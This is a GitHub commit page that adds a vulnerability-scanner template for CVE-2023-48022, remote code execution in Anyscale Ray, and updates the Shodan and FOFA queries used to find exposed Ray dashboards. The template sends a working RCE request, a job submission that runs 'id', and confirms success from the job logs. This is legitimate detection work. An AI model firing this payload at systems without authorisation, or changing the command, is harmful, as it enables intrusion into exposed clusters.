Skip to content

Commit 745ab6b

Browse files
authored
Merge pull request #12453 from riteshs4hu/main
Create CVE-2023-48022.yaml
2 parents fe0f92f + 1fc8289 commit 745ab6b

2 files changed

Lines changed: 72 additions & 3 deletions

File tree

http/cves/2023/CVE-2023-48022.yaml

Lines changed: 66 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,66 @@
1+
id: CVE-2023-48022
2+
3+
info:
4+
name: Anyscale Ray - Remote Code Execution
5+
author: riteshs4hu
6+
severity: critical
7+
description: |
8+
Anyscale Ray 2.6.3 and 2.8.0 contain a remote code execution vulnerability due to insecure job submission API, allowing attackers to execute arbitrary code remotely if they have network access to the Ray Dashboard API.
9+
reference:
10+
- https://bishopfox.com/blog/ray-versions-2-6-3-2-8-0
11+
- https://vulncheck.com/xdb/497d7fb3b118
12+
- https://github.com/jakabakos/ShadowRay-RCE-PoC-CVE-2023-48022
13+
- https://vulncheck.com/xdb/d3bafad9c9f6
14+
- https://github.com/0x656565/CVE-2023-48022
15+
- https://nvd.nist.gov/vuln/detail/cve-2023-48022
16+
classification:
17+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
18+
cvss-score: 9.8
19+
cve-id: CVE-2023-48022
20+
cwe-id: CWE-78
21+
metadata:
22+
verified: true
23+
max-request: 3
24+
vendor: ray_project
25+
product: ray
26+
shodan-query:
27+
- http.favicon.hash:463802404
28+
- http.html:"ray dashboard"
29+
fofa-query:
30+
- icon_hash=463802404
31+
- body="ray dashboard"
32+
tags: cve,cve2023,rce,ray,anyscale
33+
34+
variables:
35+
jobid: "Job_{{rand_base(6)}}"
36+
37+
http:
38+
- raw:
39+
- |
40+
POST /api/jobs/ HTTP/1.1
41+
Host: {{Hostname}}
42+
Content-Type: application/json
43+
44+
{
45+
"entrypoint": "id",
46+
"submission_id": "{{jobid}}"
47+
}
48+
49+
- | # wait for 8 seconds before getting the logs
50+
GET / HTTP/1.1
51+
Host: {{Hostname}}
52+
53+
{{wait_for(8)}}
54+
55+
- |
56+
GET /api/jobs/{{jobid}}/logs HTTP/1.1
57+
Host: {{Hostname}}
58+
59+
matchers:
60+
- type: dsl
61+
dsl:
62+
- 'status_code == 200'
63+
- 'contains(body, "logs\":")'
64+
- 'contains(content_type, "application/json")'
65+
- 'regex("uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)", body)'
66+
condition: and

http/misconfiguration/ray-dashboard.yaml

Lines changed: 6 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -12,7 +12,12 @@ info:
1212
max-request: 1
1313
vendor: ray_project
1414
product: ray
15-
shodan-query: title:"Ray Dashboard"
15+
shodan-query:
16+
- http.favicon.hash:463802404
17+
- http.html:"ray dashboard"
18+
fofa-query:
19+
- icon_hash=463802404
20+
- body="ray dashboard"
1621
tags: misconfig,exposure,ray
1722

1823
http:
@@ -26,8 +31,6 @@ http:
2631
part: body
2732
words:
2833
- "Ray Dashboard"
29-
- "webpackJsonpray-dashboard-client"
30-
condition: and
3134

3235
- type: status
3336
status:

0 commit comments

Comments
 (0)